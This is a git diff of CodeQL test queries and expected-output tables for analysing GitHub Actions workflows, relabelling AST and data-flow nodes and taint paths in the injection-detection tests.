.github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:39:9:39:10 | id | .github/workflows/test.yml:39:9:40:53 | id: sink | -| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:39:7:40:53 | - id: sink | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | id: sink | -| .github/workflows/test.yml:40:9:40:11 | run | .github/workflows/test.yml:39:9:40:53 | id: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:32:5:32:11 | runs-on | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:4:3:40:53 | job1: | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:5:34:6 | if | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:5:36:9 | needs | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:38:5:38:9 | steps | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:7:40:53 | - id: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:9:39:10 | id | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:7:40:53 | - id: sink | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:9:40:11 | run | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | cfgNodes -dfNodes -exprNodes | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:24:17:24:21 | "foo" | +| .github/workflows/test.yml:25:20:25:21 | "" | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | -| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +dfNodes +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +exprNodes +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | argumentNodes | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | usesIds -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | source | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | step | nodeLocations -| .github/workflows/test.yml:1:1:40:53 | enter on: push | .github/workflows/test.yml:1:1:40:53 | .github/workflows/test.yml@1:1:40:53 | -| .github/workflows/test.yml:1:1:40:53 | exit on: push | .github/workflows/test.yml:1:1:40:53 | .github/workflows/test.yml@1:1:40:53 | -| .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | .github/workflows/test.yml:1:1:40:53 | .github/workflows/test.yml@1:1:40:53 | -| .github/workflows/test.yml:1:1:40:53 | on: push | .github/workflows/test.yml:1:1:40:53 | .github/workflows/test.yml@1:1:40:53 | -| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | -| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/test.yml:8:19:8:49 | .github/workflows/test.yml@8:19:8:49 | -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/test.yml:23:19:23:63 | .github/workflows/test.yml@23:19:23:63 | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | .github/workflows/test.yml:27:14:27:63 | .github/workflows/test.yml@27:14:27:63 | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | .github/workflows/test.yml:29:14:29:54 | .github/workflows/test.yml@29:14:29:54 | -| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | .github/workflows/test.yml:32:5:40:53 | .github/workflows/test.yml@32:5:40:53 | -| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | .github/workflows/test.yml:40:14:40:52 | .github/workflows/test.yml@40:14:40:52 | scopes | .github/workflows/test.yml:1:1:40:53 | on: push | @@ -322,8 +345,8 @@ summaries | timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | | timheuer/base64-to-file | * | input.fileName | output.filePath | taint | calls -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | actions/checkout | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | tj-actions/changed-files | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | mad9000/actions-find-and-replace-string | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | actions/checkout | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | tj-actions/changed-files | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | mad9000/actions-find-and-replace-string | needs | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index abdd087590a..f30db9af92f 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -1,4 +1,4 @@ -import codeql.actions.ast.internal.Actions +import codeql.actions.ast.internal.Yaml import codeql.actions.Ast import codeql.actions.Cfg as Cfg import codeql.actions.DataFlow @@ -15,29 +15,29 @@ query predicate stepNodes(Step s) { any() } query predicate allUsesNodes(Uses s) { any() } -query predicate stepUsesNodes(StepUses s) { any() } +query predicate stepUsesNodes(UsesStep s) { any() } -query predicate jobUsesNodes(JobUses s) { any() } +query predicate jobUsesNodes(UsesStep s) { any() } query predicate usesSteps(Uses call, string argname, Expression arg) { - call.getArgumentExpr(argname) = arg + call.getArgument(argname) = arg } -query predicate runSteps(Run run, string body) { run.getScript() = body } +query predicate runSteps(Run run, string body) { run.getScript().getValue() = body } query predicate runStepChildren(Run run, AstNode child) { child.getParentNode() = run } query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode() = parent } -query predicate cfgNodes(Cfg::Node n) { n.getLocation().getFile().getBaseName() = "test.yml" } //any() } +query predicate cfgNodes(Cfg::Node n) { any() } -query predicate dfNodes(DataFlow::Node e) { e.getLocation().getFile().getBaseName() = "test.yml" } //any() } +query predicate dfNodes(DataFlow::Node e) { any() } query predicate exprNodes(DataFlow::Node e) { any() } query predicate argumentNodes(DataFlow::ArgumentNode e) { any() } -query predicate usesIds(StepUses s, string a) { s.getId() = a } +query predicate usesIds(UsesStep s, string a) { s.getId() = a } query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = l } diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected index d31268b12b5..51fb9314685 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected @@ -1,11 +1,11 @@ edges | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:12:35:51 | echo "H ... et }}." | -| action1/action.yml:24:7:31:4 | name: Remove foo [value] | action1/action.yml:32:12:32:50 | echo ${ ... alue }} | -| action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | action1/action.yml:24:7:31:4 | name: Remove foo [value] | +| action1/action.yml:24:7:31:4 | Uses Step: replace [value] | action1/action.yml:32:12:32:50 | echo ${ ... alue }} | +| action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | nodes | action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | -| action1/action.yml:24:7:31:4 | name: Remove foo [value] | semmle.label | name: Remove foo [value] | +| action1/action.yml:24:7:31:4 | Uses Step: replace [value] | semmle.label | Uses Step: replace [value] | | action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | semmle.label | ${{ inp ... reet }} | | action1/action.yml:32:12:32:50 | echo ${ ... alue }} | semmle.label | echo ${ ... alue }} | | action1/action.yml:35:12:35:51 | echo "H ... et }}." | semmle.label | echo "H ... et }}." | diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected index 23369932e81..7bea4429e56 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected @@ -1,12 +1,12 @@ edges -| action1/action.yml:42:7:44:4 | id: changed-files | action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | -| action1/action.yml:44:7:48:70 | id: source [tainted] | action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | -| action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | action1/action.yml:44:7:48:70 | id: source [tainted] | +| action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | +| action1/action.yml:44:7:48:70 | Run Step: source [tainted] | action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | +| action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | nodes | action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | semmle.label | ${{ ste ... inted}} | -| action1/action.yml:42:7:44:4 | id: changed-files | semmle.label | id: changed-files | -| action1/action.yml:44:7:48:70 | id: source [tainted] | semmle.label | id: source [tainted] | +| action1/action.yml:42:7:44:4 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | +| action1/action.yml:44:7:48:70 | Run Step: source [tainted] | semmle.label | Run Step: source [tainted] | | action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | subpaths #select -| action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | action1/action.yml:42:7:44:4 | id: changed-files | action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | Source | +| action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | Source | diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected index 8ec7f44dba3..6496731dd6b 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected @@ -1,11 +1,11 @@ edges | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | -| action1/action.yml:37:7:42:4 | id: reflector [reflected] | action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | -| action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | action1/action.yml:37:7:42:4 | id: reflector [reflected] | +| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | +| action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | nodes | action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | | action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | semmle.label | ${{ ste ... cted }} | -| action1/action.yml:37:7:42:4 | id: reflector [reflected] | semmle.label | id: reflector [reflected] | +| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | semmle.label | Run Step: reflector [reflected] | | action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | semmle.label | ${{ inp ... reet }} | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected index 8e19cd469ab..8d091b65547 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected @@ -1,12 +1,12 @@ edges -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | -| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | -| .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | +| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | +| .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | nodes | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | semmle.label | ${{ job ... put2 }} | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | semmle.label | job-out ... utput}} [job-output2] | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | semmle.label | Job outputs node [job-output2] | | .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | semmle.label | ${{ ste ... files}} | -| .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | semmle.label | Uses Step: step2 | subpaths #select -| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | Source | +| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | Source | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected index f7d715c9fa1..ae21052dcfe 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected @@ -1,15 +1,15 @@ edges | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | -| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | -| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | -| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | +| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | +| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | nodes | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | semmle.label | ${{ job ... put1 }} | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | semmle.label | job-out ... utput}} [job-output1] | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | semmle.label | Job outputs node [job-output1] | | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | semmle.label | ${{ ste ... utput}} | -| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | semmle.label | id: step1 [step-output] | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | semmle.label | Run Step: step1 [step-output] | | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | semmle.label | ${{ inp ... path }} | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected index 55075b7baf3..dacd31cf91c 100644 --- a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected @@ -1,58 +1,58 @@ edges -| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | +| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | -| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | -| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | -| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | -| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | -| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | +| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | +| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:21:14:24:15 | \| | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | +| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | .github/workflows/cross3.yml:41:12:43:5 | \| | | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | .github/workflows/cross3.yml:61:21:68:47 | \| | | .github/workflows/cross3.yml:61:21:68:47 | \| | .github/workflows/cross3.yml:47:12:53:109 | \| | -| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | -| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | -| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | -| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | -| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | -| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | -| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | +| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | +| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | +| .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | +| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | +| .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | -| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | -| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | -| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | +| .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | +| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | 